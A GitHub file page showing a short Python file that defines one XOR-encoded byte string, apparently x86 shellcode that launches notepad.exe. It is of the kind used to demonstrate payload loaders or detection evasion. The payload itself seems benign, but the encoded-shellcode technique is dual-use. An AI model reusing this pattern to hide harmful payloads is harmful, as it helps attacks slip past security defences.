-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathnotepad_x86_encrypted.py
More file actions
executable file
·14 lines (14 loc) · 1.16 KB
/
notepad_x86_encrypted.py
File metadata and controls
executable file
·14 lines (14 loc) · 1.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
notepad_x86_encrypted = b""
notepad_x86_encrypted += b"\xab\xbf\xd5\x57\x57\x57\x37\xde\xb2\x66\x97\x33\xdc\x07\x67\xdc"
notepad_x86_encrypted += b"\x05\x5b\xdc\x05\x43\xdc\x25\x7f\x58\xe0\x1d\x71\x66\xa8\xfb\x6b"
notepad_x86_encrypted += b"\x36\x2b\x55\x7b\x77\x96\x98\x5a\x56\x90\xb5\xa5\x05\x00\xdc\x05"
notepad_x86_encrypted += b"\x47\xdc\x1d\x6b\xdc\x1b\x46\x2f\xb4\x1f\x56\x86\x06\xdc\x0e\x77"
notepad_x86_encrypted += b"\x56\x84\xdc\x1e\x4f\xb4\x6d\x1e\xdc\x63\xdc\x56\x81\x66\xa8\xfb"
notepad_x86_encrypted += b"\x96\x98\x5a\x56\x90\x6f\xb7\x22\xa1\x54\x2a\xaf\x6c\x2a\x73\x22"
notepad_x86_encrypted += b"\xb3\x0f\xdc\x0f\x73\x56\x84\x31\xdc\x5b\x1c\xdc\x0f\x4b\x56\x84"
notepad_x86_encrypted += b"\xdc\x53\xdc\x56\x87\xde\x13\x73\x73\x0c\x0c\x36\x0e\x0d\x06\xa8"
notepad_x86_encrypted += b"\xb7\x08\x08\x0d\xdc\x45\xbc\xda\x0a\x3d\x56\xda\xd2\xe5\x57\x57"
notepad_x86_encrypted += b"\x57\x07\x3f\x66\xdc\x38\xd0\xa8\x82\xec\xa7\xe2\xf5\x01\x3f\xf1"
notepad_x86_encrypted += b"\xc2\xea\xca\xa8\x82\x6b\x51\x2b\x5d\xd7\xac\xb7\x22\x52\xec\x10"
notepad_x86_encrypted += b"\x44\x25\x38\x3d\x57\x04\xa8\x82\x39\x38\x23\x32\x27\x36\x33\x79"
notepad_x86_encrypted += b"\x32\x2f\x32\x57"